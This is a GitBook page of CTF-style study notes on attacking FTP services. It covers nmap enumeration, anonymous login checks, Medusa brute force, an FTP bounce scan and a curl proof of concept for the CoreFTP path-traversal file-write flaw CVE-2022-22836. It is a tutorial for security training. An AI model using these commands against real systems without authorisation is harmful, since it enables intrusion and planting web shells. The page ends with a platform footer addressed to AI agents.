> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/service-exploitation/ftp-21.md).

# FTP(21)

## Attacking Common Services — FTP

***

### Overview

* FTP = file transfer + directory operations
* Default port: **TCP/21**
* Attack vectors: misconfigurations, excessive privileges, known CVEs

***

### Enumeration

```bash
sudo nmap -sC -sV -p 21 <IP>
```

* `-sC` runs `ftp-anon` script → checks anonymous login
* `-sV` grabs banner + version
* Can also use `nc <IP> 21` for manual banner grab

***

### Misconfigurations

#### Anonymous Login

```bash
ftp <IP>
# Username: anonymous
# Password: (blank)
```

**If anonymous login allowed → check read/write permissions**

| Command      | Action                  |
| ------------ | ----------------------- |
| `ls` / `cd`  | navigate directories    |
| `get <file>` | download single file    |
| `mget *`     | download multiple files |
| `put <file>` | upload single file      |
| `mput *`     | upload multiple files   |

**Risk:** sensitive files readable, or malicious scripts uploadable (e.g. PHP RCE via path traversal chain)

***

### Attacks

#### Brute Force — Medusa

```bash
medusa -u <user> -P /usr/share/wordlists/rockyou.txt -h <IP> -M ftp
```

> Prefer **password spraying** over full brute force — modern apps block repeated attempts

***

#### FTP Bounce Attack

**Concept:** abuse `PORT` command on exposed FTP server to scan internal hosts not reachable directly

```
Attacker → FTP_DMZ (exposed) → PORT command → scan Internal_DMZ
```

```bash
nmap -Pn -v -n -p 80 -b anonymous:password@<FTP_IP> <INTERNAL_IP>
```

* Modern FTP servers block this by default
* Still works if misconfigured

***

### Key Flags / Options Cheatsheet

| Tool   | Flag            | Purpose                 |
| ------ | --------------- | ----------------------- |
| nmap   | `-sC -sV -p 21` | enum + banner           |
| nmap   | `-b`            | FTP bounce scan         |
| medusa | `-u` / `-U`     | single user / user list |
| medusa | `-P`            | password list           |
| medusa | `-M ftp`        | target protocol         |
| medusa | `-h`            | target host             |

### CVE-2022-22836 — CoreFTP Path Traversal + Arbitrary File Write

***

#### Vulnerability Summary

* **Service:** CoreFTP before build 727
* **Type:** Authenticated directory traversal + arbitrary file write
* **Trigger:** HTTP PUT request not properly validated
* **Result:** Write files outside the FTP service's restricted directory

***

#### Exploit

```bash
curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<pass> \
--data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
```

| Flag            | Purpose                                                     |
| --------------- | ----------------------------------------------------------- |
| `-k`            | skip SSL verification                                       |
| `-X PUT`        | use PUT instead of POST                                     |
| `--basic -u`    | basic auth                                                  |
| `--data-binary` | file content                                                |
| `--path-as-is`  | prevents curl from resolving `../` — keeps traversal intact |

***

The auth check only validates access to the FTP root folder. Since we escape it via traversal before the check completes, the restriction is bypassed entirely.

**Phase 2 — Arbitrary File Write (write anywhere)**

Once the path restriction is bypassed, the write operation has no remaining guard. The service writes whatever content you passed in `--data-binary` to whatever path you specified.

**Verify on target:**

```cmd
type C:\whoops
# Output: PoC.
```

***

#### Key Takeaway

Two separate security failures chained together:

1. Path sanitization missing → traversal succeeds
2. Write permission check happens after traversal → write has no guard left

Real-world impact: overwrite system files, drop web shells, achieve RCE.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/service-exploitation/ftp-21.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
